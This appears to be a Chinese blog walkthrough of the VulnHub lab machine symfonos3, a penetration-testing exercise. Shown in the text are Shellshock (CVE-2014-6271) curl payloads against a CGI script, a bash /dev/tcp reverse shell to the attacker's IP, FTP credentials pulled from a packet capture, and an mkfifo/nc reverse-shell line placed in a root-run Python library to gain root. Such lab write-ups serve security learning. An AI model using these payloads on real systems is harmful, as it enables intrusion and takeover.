vulnhub-symfonos3

symfonos3靶机

靶机地址:https://www.vulnhub.com/entry/symfonos-31,332/

靶机 IP:192.168.3.143

kali IP:192.168.3.133

好,准备开启奇妙之旅

主机发现

root@kali:~# arp-scan -l

端口扫描

可以看到靶机开放了21、22、80端口

nikto也没扫出有用的信息

目录扫描

root@kali:~# dirb http://192.168.3.143

Can you bust the underworld?

http://192.168.3.143/cgi-bin/

http://192.168.3.143/gate/

使用dirbuster对cgi-bin目录进行爆破

尝试访问

其输出的信息都很相似

输出的信息是和uptime命令相似

使用nikto -h http://192.168.3.143/cgi-bin/underworld/

输出的信息很多

此处存在CVE-2014-6271漏洞,破壳ShellShock漏洞

参考链接:https://www.freebuf.com/articles/system/45390.html

root@kali:~# curl -A " () { :;};echo;echo 123;" http://192.168.3.143/cgi-bin/underworld/

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.3.143/cgi-bin/underworld

使用mfs搜索漏洞

exploit/multi/http/apache_mod_cgi_bash_env_exec

还可以使用payload进行反弹shell

root@kali:~# curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.3.133/4444 0<&1 2>&1" http://192.168.3.143/cgi-bin/underworld

root@kali:~# nc -lvnp 4444

靶机IP变为192.168.3.146

再tmp目录下下载pspy64

cerberus@symfonos3:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

添加可执行权限

cerberus@symfonos3:/tmp$ ./pspy64 -pf -i 1000

运行脚本

可以看到靶机有提供ftp服务,而ftp服务是明文传输,所以可以尝试抓取流量包进行分析

看看主机是否有tcpdump

需要再tmp目录下才有权限

每次ctrl c就会退出shell,emmm

在靶机上开启http服务

python -m SimpleHTTPServer 7777

root@kali:~# wget http://192.168.3.146:7777/ftp.pcap

用wireshark进行分析

USER hades

PASS PTpZTfU4vxgzvRBE

使用这个用户去ssh登录

hades对ftpclient只有读权限,查看文件内容

查看hades对那些文件具有可写权限

hades@symfonos3:/opt/ftpclient$ find / -writable -type d 2>/dev/null

咳咳,我到此为止了,看网上的writeup都是修改ftplib.py反弹shell,看看权限

不明白大佬们都是怎么改的动的,溜了溜了

最后,反弹shell

import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.xxx.xxxx 4444 >/tmp/f')

··············莫的感情的分割线·················

不甘心,恢复快照直接ssh连接,又看了下权限,玄学,怎么不一样?但是可以改内容了

等了一会,接收到会话了

flag /root/ proof.txt

这台靶机是玄学吗?我也没发现gods这个用户,为什么?如果有dalao知道,请务必告诉我。

咳咳,最后的最后(别打,真的最后)

闲着没事,隔一段时间执行ls -l |grep ftplib一次这个命令

难道是作者设置的靶机开启规定时间内要做到提权这一步???????

原文地址:https://www.cnblogs.com/JKding233/p/13921886.html